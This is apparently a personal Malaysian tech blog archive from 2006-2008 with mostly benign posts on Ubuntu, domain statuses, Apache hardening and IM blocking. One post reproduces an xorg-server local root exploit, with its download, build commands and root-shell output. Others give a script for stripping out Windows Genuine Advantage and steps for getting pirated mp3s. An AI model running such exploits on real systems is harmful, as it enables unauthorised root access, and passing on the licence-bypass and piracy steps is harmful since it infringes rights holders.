Saturday, June 14, 2008

Install Ubuntu From Windows

After one year im using windows vista.
I feel that the software sucks. It use lots of memory even though i have 3gb Ram.
When i surf around, i found a software call Wubi.
Wubi is a software that you can run from your windows to install ubuntu.
So those who want to change to Ubuntu. Download this software and with one click you can have your ubuntu on your laptop/desktop.
Here is the installation screen shot.
I havent finish install yet because my internet connection totally sucks.
Below is the screen shot of the installer. Will update you guys when I write a post using Ubuntu ;)


for more information visit http://wubi-installer.org/

Labels: , ,

Sunday, June 08, 2008

New g3ek Tools

I added 2 new functions for g3ek out there.
The first function is url shortenerr. this function may help you shorten any url using our subdomain which is http://anytag.g3ek.net . You may choose your own tag and make a subdomain. By doing this way, you can hide your affiliate links and you may also shorten a long url that hard to remember. It also helps you to post link in forums or blogs. Our URL shortener helps you to turn ridiculous url into short, meaningful, permanent url. You may directly go to this g3ek tools using the following link : http://www.g3ek.net/short/

The second function is free image hosting. This function will host your image without limiting any bandwidth to the image. Our server is located in Singapore so this is advantage for those who are living nearby singapore or in asia region since the latency and speed is better than other International servers. We will not charge any cents to g3ek out there and we have limit the upload size to 140000 bytes. You are welcome to promote our free image hosting to your g3ek friends. You may directly upload your image using the following link: http://www.g3ek.net/upload/

Labels: , , , ,

Wednesday, May 28, 2008

Review on Sandisk Sansa

Today i went to low yat with my friend mice. At first, i thought i just want to accompany him to buy his things but at last i bought a new mp3 player which is San Disk sansa 2gb.

The overall impression for this item is "It is a very good buy and It worth your money"
I bought the item at RM180 ringgit only. Compare to others like sony and samsung, i think san disk is the cheapest.
The best thing about this mp3 player is you can add-on a micro sd card for bigger space.
Here is the summary:

Outlook: A bit bigger than thumb drive but surely I will carry this item around instead of my boring thumb drive. Looks expensive compare to Samsung and Creative 1Gb mp3 players.
Space: 2GB + Micro Sd Card Storage
Functions: Voice Recording, Mp3 Player, FM tune, Can act like normal thumb drive.
Battery: Last for at least 10 hours.

Although I have this newly mp3 player, i still sad because i lost my Ipod Nano.
Hope i will find it soon. *pray*

Labels: , ,

Wednesday, May 14, 2008

Ever Wonder What the Exact Domain Status?

do you always perform a whois on a domain?
maybe lots of you do not know what is the exact status of a domain name.
a domain name always have a status given from the registrar such as active, pending delete and etc.
The following articles is the complete guide for a domain status

ACTIVE: The registry sets this status. The domain can be modified by the registrar. The domain can be renewed. The domain will be included in the zone if the domain has been delegated to at least one name server.

REGISTRY-LOCK: The registry sets this status. The domain can not be modified or deleted by the registrar. The registry must remove the REGISTRY-LOCK status for the registrar to modify the domain. The domain can be renewed. The domain will be included in the zone if the domain has been delegated to at least one name server.

REGISTRAR-LOCK: The sponsoring registrar sets this status. The domain can not be modified or deleted. The registrar must remove REGISTRAR-LOCK status to modify the domain. The domain can be renewed. The domain will be included in the zone.

REGISTRY-HOLD: The registry sets this status. The domain can not be modified or deleted by the registrar. The registry must remove the REGISTRY-HOLD status for the registrar to modify the domain. The domain can be renewed. The domain will not be included in the zone.

REGISTRAR-HOLD: The sponsoring registrar sets this status. The domain can not be modified or deleted. The registrar must remove REGISTRAR-HOLD status to modify the domain. The domain can be renewed. The domain will not be included in the zone.

REDEMPTIONPERIOD: The registry sets this status when a registrar requests that the domain name be deleted from the registry and the domain has been registered for more than 5 calendar days (if the delete request is received within 5 days of initial domain registration it will instead be deleted immediately). The domain will not be included in the zone. The domain can not be modified or purged; it can only be restored. Any other registrar requests to modify or otherwise update the domain will be rejected. The domain will be held in this status for a maximum of 30 calendar days.

PENDINGRESTORE: The registry sets this status after a registrar requests restoration of a domain that is in REDEMPTIONPERIOD status. The domain will be included in the zone. Registrar requests to modify or otherwise update the domain will be rejected. The domain will be held in this status while the registry waits for the registrar to provide required restoration documentation. If the registrar fails to provide documentation to the registry within 7 calendar days to confirm the restoration request, the domain will revert to REDEMPTIONPERIOD status. The domain status will be set to ACTIVE only if the registrar provides documentation to the registry within 7 calendar days to confirm the restoration request.

PENDINGDELETE: The registry sets this status after a domain has been set in REDEMPTIONPERIOD status and the domain has not been restored by the registrar. The domain will not be included in the zone. Once in this status all registrar requests to modify or otherwise update the domain will be rejected. The domain will be purged from the registry database after being in this status for 5 calendar days

source: domaintools.com

Thursday, January 31, 2008

Hide PHP and Apache Version Number

One of the most basic security practice in the web application world is to hide your web server’s software version number. It doesn’t matter if you use Apache 1.3.37 or lighttpd 1.4.10 on a Linux machine or IIS-5.0 on Windows, hiding the version number is crucial if you want to mitigate the risk of your server being attacked by troublemakers.


BEFORE TREATMENT:

AFTER TREATMENT:

Version numbers are the first thing a typical hacker will look for if they want to attack your server. This is because once they know what version your web server is running on, they can easily look for what kind of vulnerabilities are associated with that version, and then simply run the related exploit to hack your server. Attackers can easily know the type and version of your webserver by looking at the HTTP response headers received after they send requests to your application through a Telnet program, or by using Firefox addons/extensions like ServerSpy and Live HTTP Headers in order to see your web server’s version the moment they visit your site.
So hide your Apache and PHP version!
In order to do this, you need to do some sys admin job. I am going to specifically focus on Apache and PHP because I am more of a LAMP (Linux + Apache + MySQL + PHP) user. If you use ASP on Microsoft IIS, I can’t help you much with all these version-hiding thingy (but hey, Google is there to save your day! )
So here goes..
Hide Apache version number:
Open your Apache’s httpd.conf file (in my case, # vi /usr/local/apache/conf/httpd.conf), and look for the line that says: “ServerSignature On“
Change it to “ServerSignature Off” (this will hide the Apache version normally seen at the bottom of your 404 error pages)
Then add “ServerTokens Prod” below that line (to hide the version in HTTP response headers)
Restart your HTTP service (# /etc/init.d/httpd restart)
Done! No more Apache version numbers
Hide PHP version number:
Find your php.ini file (in my case, # vi /usr/local/lib/php.ini), and look for the line that says: “expose_php On“
Change it to: “expose_php Off“
Restart your HTTP service if necessary
Done! No more PHP version number in your HTTP response header
Wasn’t that hard now, was it? Just a few tweaks can save you a great deal of security risk, and may save you your business too! Bear in mind that this does not in any way protect from real vulnerabilities that may be associated with your version. Patches or upgrades should still be applied. However, hiding the version numbers will at least make the hackers life harder

Tuesday, December 04, 2007

phpinfo internal server error 500

if you try to execute phpinfo from a php file and you get 500 internal server error it is because of the permission of the file. here are the details


If you get 500 Internal Server Error message,

1. Check whether the file permission is set to 700. If your file permission is set to something else (e.g., 777 or 644), you will get a 500 - Internal Server Error.

Note: Setting the file permission to 711 or 755 will not give you a 500 error, but we strongly recommend using 700 for security reasons.

Search tools such as Google Code Search make it simple to find Web sites vulnerable to attacks by enabling users to search for regular expressions, exact strings and even restrict their searches to code written in specific programming languages. The tool searches all of the publicly available source code it can find. So you should not set the permissions of your files 755.

2. Check the Directory (folder) permission. Setting it to 777 will give you a 500 - Internal Server Error.
Set it to 711.

3. When the file/directory permissions are set correctly, and you are still getting a 500 error, you need to work with the file on Unix.

  1. Using SSH, connect to your account. For instructions on how to use SSH, please see How to use SSH
  2. Move to the directory where your php file is using the cd command.
  3. Open the file using pico and save it (Ctrl+o).
This simple steps may solve your problem because it converts Windows CR/LF (carriage return/line feed) to Unix LF (line feed) or Mac CR to Unix LF.

To prevent this problem, you need to change settings/preferences in the program you are using to develop php files. To set preferences in Dreamweaver, go to Edit => Preferences. Select Code Format or HTML Format (depending on the versions). Change Line Breaks to LF (Unix).

Thursday, July 12, 2007

ever thinking to have own VOIP server?

have you ever thinking to make your own VOIP / SIP server but you dont know how to operate on nix plateform?
It is ok. This is an answer for you.

Get your own windows based sip server here:
http://www.3cx.com

what 3cx can do? what is the advantage?
  • Complete phone system: Provides call switching, routing & queueing
  • Purchase cost dramatically lower than a traditional hardware PBX
  • Scaleable - Unlimited extensions and phone lines. No proprietary expansion modules needed!
  • Web based configuration & status indication - Easy phone system management!
    Unified messaging: Receive voice mail via e-mail
  • Auto attendant (e.g. 1 for sales, 2 for support etc.)
  • Reduce long distance and inter office call costs
  • No more expensive proprietary system phones: Use standard SIP phones
  • Eliminate the phone wiring and make moving offices easier

I will review this software after i moved to a new house.Telephone line is not in yet.

Saturday, October 28, 2006

There Is No Disk in the Drive Error

I keep getting this message in this computer and i would like to share the problem with you guys.To solve the problem you just need to follow the following prosedure:

CAUSE
This issue occurs when all the following conditions are all true:
•You have a removable drive, such as an Iomega Zip drive, configured as drive letter C.
•You do not have a removable disk in the removable disk drive.


RESOLUTION

To resolve the issue, use one of the following methods:
•Insert a removable disk in the removable drive before you start the computer.
•Change the drive letter assignment for the removable drive to a letter other than C.To change the drive letter assignments in Windows XP, follow these steps:
1.Log on to the computer as Administrator.
2.Insert a disk in the removable drive.
3.Click Start, right-click My Computer, and then click Manage.
4.Click Disk Management.
5.Right-click the partition, logical drive, or volume that you want to change, and then click Change Drive Letter and Paths.
6.Click the removable drive, click it, click Change, click the drive letter that you want to use, and then click OK.

Wednesday, October 25, 2006

Yahoo Messenger on Pocket PC

hi everyone. just drop by to share a link.
here the link to yahoo go!
http://go.connect.yahoo.com/go/mobile/download?download=pocketpc
now everyone can chat even with your pocket pc!
im quite busy now to update this blog but surely will update it :)
see ya!

Wednesday, August 30, 2006

How to format Nokia Phone

Steps
Turn your device off.
Remove SIM card and MMC card (actually, you do not need to remove these, but after format remember to format memory card and reboot phone).
Press (3 + * + CallButton) Together.
Turn your device on while you are pressing the three buttons.
You should now see "Formatting .." on the Screen! Leave the buttons now.

Tips
You can also use some programs to format the device for you.
The format will not include the MMC Card, only the device (C Drive)...
The above method isn't always easy. You can do the format using this simple key combination *#7370# and the phone will prompt you to enter the phone lock code which is 12345 by default.

Warnings
Don't apply these steps if you are not sure what you are doing.
Make sure you have enough battery power before beginning this procedure.
Formatting will erase all your contacts/messages, so make a backup of your phone before formatting.

Friday, July 21, 2006

g3ek mail in operation

guys,
drop me an email at nik@g3ek.net to register yourname@g3ek.net
heres the screenshot



Login page: http://mail.g3ek.net



Are you a g3ek?
http://en.wikipedia.org/wiki/Geek

Tuesday, July 18, 2006

g3ek.net email powered by gmail

Atlast, my application to use gmail as my email server approved.
Below screen shot shows google team has approved my application:



and heres the control panel:



What i need to do is change my MX record to gmail server.
If you have access to WHM. Set it as below:


if you guys want g3ek.net email. Drop me an email.
You will get yourname@g3ek.net

or if you want this function for you website
just sign up here, and wait for the approval letter
https://www.google.com/hosted/

Lets chill!!

C++ Bus Reservation System

This is just for your guide using 2 dimensional arrays and struct
Happy Studying!!


Click below to download the source code:
http://www.g3ek.net/files/melakabus.zip

c++ Cinema Reservation System

Finally, My first assignment for computer programming two completed but with some bugs.
anyway, i just want to share with you and hope you can learn from it.
This assignment is really simple because theres no object oriented thingy and i only used arrays.
You can download it here together with the documentation. I included problem that i face and also the limitation. It also includes the flow chart for the program.


Download Cinema Reservation System below:
http://www.g3ek.net/files/cinema.zip

Friday, July 14, 2006

Forex Trading

Hey. For those interested in forex trading. I suggest you to use marketiva.
Create an account at www.marketiva.com and download the software and start playing.
You will be given bonus $5 for live trading and you can train yourself using the virtual trading in the software. The starting value for vitual trading is $10000. Give it a try and practise and start to earning. Below are the screenshot:




Heres your target : Buy currency at a lower price and sell it when the value increased. Use the chart and dont forget to set your target.

Wednesday, June 28, 2006

Colour In Dev C++

im trying to do an assignment and it involved colour in the command line.
just want to share the code. Change the K value to see various colour

Software: Dev-C++
Language: C++
Souce Code : Click Here


Saturday, June 17, 2006

Fake Remove or Block Website Ads

I found a simple way to block website ads.
The theory is you redirect domain name to any IP that you like so the user cannot access the website.

Step by step instruction:

For Windows XP

1. Go to folder hosts file and replace the existing hosts file in the directory
3. Run > cmd > nbtstat -R

Done!

For Windows 2000

1. Go to folder C:\WinNT\system32\drivers\drivers\etc
2. Download this hosts file and replace the existing hosts file in the directory
3. Run > cmd > nbtstat -R

Done!

Friday, June 16, 2006

Instant Messenger IP Address

Today we received our trend micro office scan.
I managed to setup to all the computer using Remote Client Install.
It is a very nice Server Based Anti-Virus that i ever used.
Below are screen shot taken by me at home using Radmin


Heres the lovely part. This trend micro includes firewall for client.
I use this features to block Instant Messenger for the Normal User.
What you need to do is block their IP range and thats it.See the Ip ranges below:


AOL IM / ICQ
Default Port: 5190
specific target IP(s):
64.12.200.89
205.188.153.121
205.188.179.233
64.12.161.153
64.12.161.185
range of IPs owned:
64.12.0.0 - 64.12.255.255
205.188.0.0 - 205.188.255.255


MSN
Default Port: 1863
specific target IP(s)
207.46.104.20
range of IPs owned
207.46.0.0 - 207.46.255.255

mail.hotmail.com
Default Port: 1863
specific target IP(s):
65.54.254.129
65.54.166.99
range of IPs owned
65.52.0.0 - 65.55.255.255

nexus.passport.com
Default Port:
443
range of IPs owned:
65.52.0.0 - 65.55.255.255

login.passport.com
Default Port:
443
range of IPs owned:
65.54.183.198, 65.54.179.198

loginnet.passport.com
Default Port: 443
range of IPs owned
65.54.179.192, 65.54.183.192


Trillian
Default Port: 1863
specific target IP(s)
66.216.70.167
range of IPs owned
66.216.64.0 - 66.216.127.255


Yahoo
cs.yahoo.com
Default Port: 5050
specific target IP(s)
216.136.233.128
range of IPs owned
216.136.128.0 - 216.136.131.255
216.136.172.0 - 216.136.175.255
216.155.192.0 - 216.155.207.255
216.136.232.0 - 216.136.235.255

mail.yahoo.com
Default Port:
?
specific target IP(s)
216.109.127.60
range of IPs owned
216.109.112.0 - 216.109.127.255

yahoo.com
Default Port: ?
specific target IP(s)
66.218.71.114
216.109.127.28
216.109.127.29
216.109.127.30
66.218.71.112
66.218.71.113
range of IPs owned
66.218.64.0 - 66.218.95.255
216.109.112.0 - 216.109.127.255

How to recover windows 2000 password

Today theres on PC i need to retrive the administrator password.
I dont know why the password is incorrect. maybe some other g3ek have changed it. But well, i can still manage this problem using Austrumi. What actually you need to do is download this software from their website and burn into a CD. This CD is bootable and they using linux technology.

Details:

Austrumi (v0.9.2 - December 2004)
Austrumi is a Linux bootable ISO image for recovering NT passwords and other cool tools and methods, sized for Business Card size CD media (50Mb). It allows you to change any password, including that of the Administrator, on a partition occupied by Windows NT, Windows 2000 or Windows XP. Simply boot the CD and when you get to the initial boot prompt, type:
boot: nt_pass
This will launch a console utility that will detect Windows partitions on the hard disk and provide you with a menu to modify any user or Administrator passwords on the Windows system. It will even give access to the Windows registry for recovery purposes. Quite a handy utility to keep in your wallet (AUSTRUMI is small enough to fit on a business card-size CD) if you are unfortunate enough to having to deal with Windows machines in your line of work.

Read more at http://sourceforge.net/projects/austrumi

Download links:
Austrumi v0.9.2 (ISO file, 50.9mb)

Wednesday, June 14, 2006

Looking for Brontok / Brontox Remover?


After my war with brontox. I found a brontox remover that make my life easier.
If you are looking for:
- anti brontox
- brontox cleaner,
- brontox bye
- brontox remover


here's are the answer

This virus are made in indonesia.

click to download: anti brontox

Tuesday, June 13, 2006

How to add default PATH in Freebsd?

First of all. you need to check what type of shell do you use.
--------------------------------------------------------------------
freebsd# finger wan
Login: wan Name: Nik Muhammad Izwan
Directory: /home/wan Shell: /bin/sh
On since Mon Jun 12 19:25 (MYT) on ttyv0, idle 3:02 (messages off)
On since Tue Jun 13 17:02 (MYT) on ttyp0 from 192.168.0.212
No Mail.
No Plan.
--------------------------------------------------------------------

In this matter i used /bin/sh shell. I would like to add /usr/local/sbin in my default PATH.The following command will make me happy:

--------------------------------------------------------------------
freebsd# set PATH = ( $PATH /usr/local/sbin )
--------------------------------------------------------------------

Note: i put $PATH is to maintain the original PATH in my default PATH

Friday, June 09, 2006

Future Software Engineer?

I've been quite busy this month and could not post any article inside my blog.
I am now working with Tidalmarine Engineering and Dr.Nik & Associates in their IT Support Department. (temp only)
Heres are some pictures i've taken inside my room in my office. Hehe
Staytuned!

1. My Messy desk. War within me and viruses


2. Abg Sabri's Desk. War between him and Brontoks

3. Unbranded 1U server Powered by Freebsd
and my lovely laptop.

4. Server and PC Clinic Opening Now :p


5. Door Access Server (Flushing In Progress)


6. Totally Unmanaged Switch . hahaha


8. Stay away from me!

Monday, May 29, 2006

How to download mp3 using mIRC

My sister asked me how i get all the pirated mp3s.hahaha.
Ok. i will explain where do i get all my mp3s and how to download them!
First of all what you need is mIRC client
you can get it at www.mirc.com

then configure your nickname in this dialog box.

go to SOUNDS > REQUEST > Untick "Listen for '!nick file' get requests" as below, Then press ok.

You need to connect to a server. My favourite server to download mp3 is webchat. To connect to the server, type /server glass.webchat.org

If you are first time user using this server. You need to register your nickname by typing /ns register password email

After 5-10 minutes, you will get an email says you need to verify the registration. copy and paste the line starts from /verify . example : /VERIFY AAAAAcIA0AbqBRkRmykQAA-1561927617 in mIRC



You're succesfully registered now!
Join #mp3zs by typing /j #mp3zs

type /UMODE +ixCRWJr-mMep in order to allow server send you a file

to find a song . type @find songname

servers will private message you regarding you request.

Copy and paste the song staring from the "!" symbol in the channel. example !!white_xenon Radja_-_03_-_Jujur.mp3

Wait until they send you the song.

Have fun downloading.

Can Myspace IM beat MSN and Yahoo! ?

Have u tried myspace IM?
Sounds cool isnt it?
You can add your myspace friend through it and chat with them.
Below are screen shot taken from my pc



to those who live in asia. i have mirrored the installer file at
MyspaceIM : http://www.g3ek.net/files/MSIMClientSetup.1.0.302.0.msi

Theres no harm to try! Download it today!
Maybe this IM can beat MSN and Yahoo Messenger in the future. Who knows?
Do add me at putera[at]nik.com.my

Saturday, May 27, 2006

Taking Call With Shoutcast

I got a lot of question regarding how i broadcast a call when i become a DJ using shoutcast.
I will post a rough work and will post a good product later.( maybe i should sell it ? )
ok. to broadcast a call using shoutcast is quite an easy job if we use speaker phone.
What you need to do is just put one mic to a speaker phone and another mic to yourself.
this method is not really a thrill to a geek.
and here's another method that i use.

I create this tutorial using my nokia 3230 and took picture with it as well. Sorry because it is not so clear but i dont have my camera right now to take pictures.

Tool that you need :
-soldring iron
-cheap handsfree
-some wires
-wire cutter
-nokia handphone


heres the concept what we going to do:


How we gonna do it?
1.First get a cheap handsfree from nearest handphone shop



2. Peel of the rubber of the head and you will see only the head connector.


3. Solder wire according to the following picture, the connector will looks like this and you need to connect 2 wires from connector to the soundcard plug(i dont know what this plug name but you can find in any hardware shop)


Connect with this plug:



This is the finished product from me. Such a rubbish thingy but it still do the job.




Connect all the wires according to the concept that i have posted above.
if you still have any other question regarding this. Do not hesitate to contact me
I will try to help

Good Luck~!

RM3000 is enough to live in malaysia?

Electricity charge in malaysia will increase start from 1st of june.
i got an email that shows calculation wether we can suvive or not living in malaysia with income RM3000 per month.Lets see this, those who cannot understand malay should learn how to read it :P


Letrik Naik, Cukupke Gaji RM3,000 Sebulan?
Let's to do some calculations here.

In Malaysia the average family income is RM3000 (Father works, mother doesnt). I understand there are a lot of families whose income don't reach RM3000, but, to make things simple, lets take RM3000 as the figure. ok la right?

Okay, let's start rolling with a family which has Papa, Mama, 1 daughter and 1 son. ngam ngam..
Calculation starts...

Electricity and water bil RM100 (no aircond, no home theatre, no water heater k?)

Telekom and Handphone bil RM100 (cannot make a lot of calls one you know? NO Streamyx also)

Meal for the whole happy family RM775 (3 meals on RM25/day, RM25 for 4 persons????)

Papa makan/teh tarik during working hours RM155 (RM5/day, RM5 can eat what?)

Car repayment RM400 (a proton saga aeroback, 7 years repayment)

Petrol RM300 (Living in City, Jam) Go to work, bring son to school, only can afford one car running.

Insurance RM650, (kids, wife and myself).

House repayment RM750 (Low cost housing repayment for 30 years, retired still have to work to pay house!)

Tuition RM80 (got that cheap meh?? No, I don't think so)

Older children pocket money @ school RM20 (RM1/day, eat bread??)

School fees RM30 (enough ah??)

School books and etc etc. RM100 (always got extra to pay in school)

Younger children milk powder RM50 (cannot have the DHA, BHA, PHA one, expensive)

Miscellaneous RM100 (shampoo, rice, sauce, toilet paper)

oh wait!!! I have to stop here, so... No Astro, no movie @ cinema, no DVD, no CD, no online, cannot KFC, cannot Mc Donald, cannot go Park walk during weekend(petrol expensive), no chit chat on phone with grandparents, and etc...

Let's use a calculator to total up... WALAO EI.. Shit! RM3610 already.. EPF belum potong, income tax lagi,........ oledi --- RM610...

How to survive laa tuan-tuan dan puan-puan sekalian??? Our Deputy Prime Minister ask us to change lifestyle? How to change? Don't eat? Don't work? Don't send children to school and study?

Besides that, I believe in Malaysia population, there are millions of Rakyat Malaysia which still don't earn RM3000/month!!!

What is this? Ini lah Malaysia Boleh.. Sorry.. it should be Malaysians

Boleh, because we're still alive and kicking!!

Our politicians must be mad!!!!!!

p/s - Hari ni 25/2/2006, eletrik naik 12% kalau dulu belanja RM100 sebulan sekarang dah RM112 sebulan. Kerajaan Barang Naik memang bagus... najib kata rakyat Malaysia perlu ubah cara hidup... aku kata ubah kerajaan...

Free Hosting

Do you want to create a website?
It is easy. Try googlepages.
Its free, you can create your HTML web there.
you just have to customize your web using WYSIWYG editor.
google will give you a nice url which is http://yourusername.googlepages.com
and the bandwidth is unlimited i guess.
mine is http://nikizwan.googlepages.com

Friday, May 26, 2006

Malaysia Postcode

After tired of searching list of postcode in Malaysia.
Finally i found a basic structure of the postcode in Malaysia according to the respective state.
The postal codes used in Malaysia is a 5 digit code.
Listed below are the first 2 digits of codes assigned to each state and special administrative area. The state capital is indicated in the brackets.

States
Johor (Johor Baharu) uses codes from 80xxx to 86xxx
Kedah (Alor Setar) uses codes 02xxx and from 05xxx to 09xxx
Kelantan (Kota Baharu) uses codes from 15xxx to 18xxx
Melaka (Melaka) uses codes from 75xxx to 78xxx
Negeri Sembilan (Seremban) uses codes from 70xxx to 73xxx
Pahang (Kuantan) uses codes from 26xxx to 28xxx
Perak (Ipoh) uses codes from 30xxx to 36xxx and 39xxx
Perlis (Kangar) uses codes 01xxx
Pulau Pinang (Georgetown) uses codes from 10xxx to 14xxx
Sabah (Kota Kinabalu) uses codes from 88xxx to 89xxx
Sarawak (Kuching) uses codes from 93xxx to 98xxx
Selangor (Shah Alam) uses codes from 40xxx to 48xxx and 62xxx to 64xxx
Terengganu (Kuala Terengganu) uses codes from 20xxx to 24xxx

Special Administrative Area
Kuala Lumpur uses codes from 50xxx to 60xxx and 68xxx
Labuan uses codes 87xxx
Putrajaya uses codes 62xxx
Cyberjaya uses codes 63xxx

Hope this can help with your web database for searching an address.

Coding Method



UPU Address Format

Addresses are normally in the following format:
line 1: name of addressee;
line 2: house no./block no./thoroughfare no./floor and building name;
line 3: additional locator name/name of garden;
line 4: postcode and locality name + name of state;
line 5: name of country.

Official Post
Post malaysia berhad - http://www.pos.com.my

Thursday, May 25, 2006

Domain and Webhosting

Good news to all radio online managers.
I would like to sell malaysia.fm subdomain.
The cost for this subdomain is Rm5/month or Rm50/year .
You can order any of yourname dot malaysia.fm
eg. myradio.malaysia.fm
Hurry. limited names available.

Those who want to find a good and fast webhosting. Try to checkout www.nikhost.com
you can register domain with us as well.
For any question. Drop me an email at nikizwan[at]gmail.com

Thanks.

Wednesday, May 24, 2006

Mind Reader

Sorry guys, havent update my blog for awhile.
Busy with my examination. I will post some cool project after my exam finish.
by the way. i would like to ask you.
Have someone read you mind before?
OK. lets try this out
Go to http://trunks.secondfoundation.org/files/psychic.swf
this thing will read your mind.

1.think any two digit number . example : 23
2.add the two number. example for 23 is 2+3 which is equal to 5
3.Then minus 23 with 5
4.lookup the chart and see the symbol.
5.click on the magic ball

Haha! this thing just read your mind. Beware!

Saturday, May 20, 2006

Tip of the day

This is one of the command shorcut key that i use everyday. How to go to a curtain web address without typing "www." and ".com"? You just have to type let say "yahoo" in the address bar and press CTRL + Enter. The browser will automatically become www.yahoo.com thats it!

Friday, May 19, 2006

Block Yahoo and MSN Messenger

I found an article that shows how to block msn/yahoo messenger using linux firewall. This tool create a strong firewall using iptable and squid.There are 4 main items so setup this firewall
1.DHCP
2.IPtables
3.Squid Proxy
4.Crontab.

Read this documentation for more information:
http://g3ek.net/strongfirewall.txt

Yahoo Display Image

Ever wonder to put your display image fit as it can? erghh..what kind of english is this? not sure..haha..whatever
ok. my point is, how to resize your image to fit in the yahoo window like one of my picture below

Lets do it!!!

1. Open Adobe Photoshop
2. Open any of your image


3. Image > Image Size



4. Untick Constrain Proportions



5. Resize Width and Height for 96 px



6. Press OK
7. Save As > New File Name > Save as JPG
8. You got a new size picture. Load it in your yahoo messenger

p/s: i dont know what kind of tutorial is this. im not a graphic designer but my girl ask me to do it for her and this might be useful to you too.. :)

Thursday, May 18, 2006

Brain Teaser

haha. Its almost 2 am here. yan and me keep talking on the yahoo messenger.
he found a cool thing.
first of all what u need to do is
download this image

then look at the 4 dots about 30 second.
next what you need to do is your bedroom wall.
tell me what you see!

want some more?
go to http://www.metacafe.com/watch/130282/video/

Saturday, May 13, 2006

Linux on iPod

Today is a boring day. I just sitting down on my table and starts to think what should i do with my old iPod. This is what i found on the net. Using linux on iPod. but unfortunately i cant really do this becouse i dont have mac in my house. I need a mac to do it. Someone donate me a mac :D hehehe..anyway, if you guys have the tools. try it . no harm.
for more information. go to http://ipodlinuxinstl.sourceforge.net
have fun everyone~!

Friday, May 12, 2006

Reminder For Non-Genuine Windows Users

This is just a reminder for non-genuine windows users.
Please off your automatic update for your windows.
It will install the WGATray again and you will be annoyed by the windows genuine notification again.
Hope this help.
If you really wanted to update your windows.
Buy original cd from MICROSOFT :D

x11 exploit.

I dont know wheather this still works or not. but yet you can still try

# From Daniel Stone's Advisory
# xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates
# of X11R7.0, is vulnerable.
# X11R6.9.0, and all release candidates, are vulnerable.
# X11R6.8.2 and earlier versions are not vulnerable.
# The rest is H D Moore from metasploit
Two second exploit, but if anyone is lazy:
$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath$ ./root.sh
/bin/rm -f exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c

X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

# backup: http://www.milw0rm.com/sploits/xmodulepath.tgz
# milw0rm.com [2006-03-20]

YM Auto Responder and Status Changer

I found a great somewhere to use for yahoo messenger. It is a auto responder. U can create a custom message when someone message you either when you are idle or you are away.
check this out guys
http://dasaco.net/ytool/a4y.htm

and another cool program that i found in the same website is yahoo status changer. You can change dynamically your status. Set the time in second and create a list for your status.
this is the link
http://dasaco.net/ytool

Great huh?

How to secure your wifi?

This are some tips how to secure your wifi and prevent unathorize users
  • change your factory default admin password
  • turn off SSID broadcasting
  • change the default SSID name
  • turn on WPA or at the very least enable WEP

For the more g3ek out there, you can also:

  • further filter access via MAC addresses
  • turn off DHCP and assign static IP’s
  • authenticate wireless users with FreeRADIUS (WPA Enterprise)
  • determine the correct placement of your wifi router for minimal outside leakage
  • turn wifi or hard wired network OFF during long periods of no activity
  • put a firewall between your LAN and access point

Thursday, May 11, 2006

A good keyword for your website

Looking for a tip how to optimize your site for the search engine?
I just want to share you one tip for today.
a good keyword can determine how many visitors come to your website.
To choose a good keyword, first we must search using this great tool
http://inventory.overture.com
choose an appropriate keyword which are not too general and dont target your website will become top ten with a general keyword, try to find something contains 2 words . for example "stupid blog" rather than "blog"
Have fun in optimizing your website :)

Free web hosting control panel

Today im too bored and would like to find something new and free.
just browsing about free webhosting control panel.
i found a new panel that support freebsd6 which is great at www.raqdevil.com
other free control panel which can be implemented in fedora core is vhcs.
check this out
www.vhcs.net


later i will post how to install raqdevil in freebsd.

How to remove windows genuine notification

I just wonder how to pass by this setting and how to remove this annoying popup.First of all what you need to do is open a blank text file using a notepad.
copy and paste this quote.




"%windir%\system32\wgatray.exe /u"reg delete "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Notify\WgaLogon" /fdel /f /q
"%windir%\system32\wgatray.exe"del /f /q
"%windir%\system32\dllcache\wgatray.exe"del /f /q
"%windir%\system32\WGAlogon.dll"del /f /q
"%windir%\system32\dllcache\WGAlogon.dll"rmdir /s /q
"%windir%\SoftwareDistribution\Download\6c4788c9549d437e76e1773a7639582a"pause


then save as WGAFix.bat .
Make sure you choose All files when saving the file
Run the file and immediately restart your windows.
Good luck~!

See screenshot below:

or you can download the file here


Wednesday, May 10, 2006

Installing Apache 2.2 From ports.

Just browsing my pc and i found a useful documentation to install apache. those who can understand malay can read this as a guide

please go to http://www.g3ek.net/apache.txt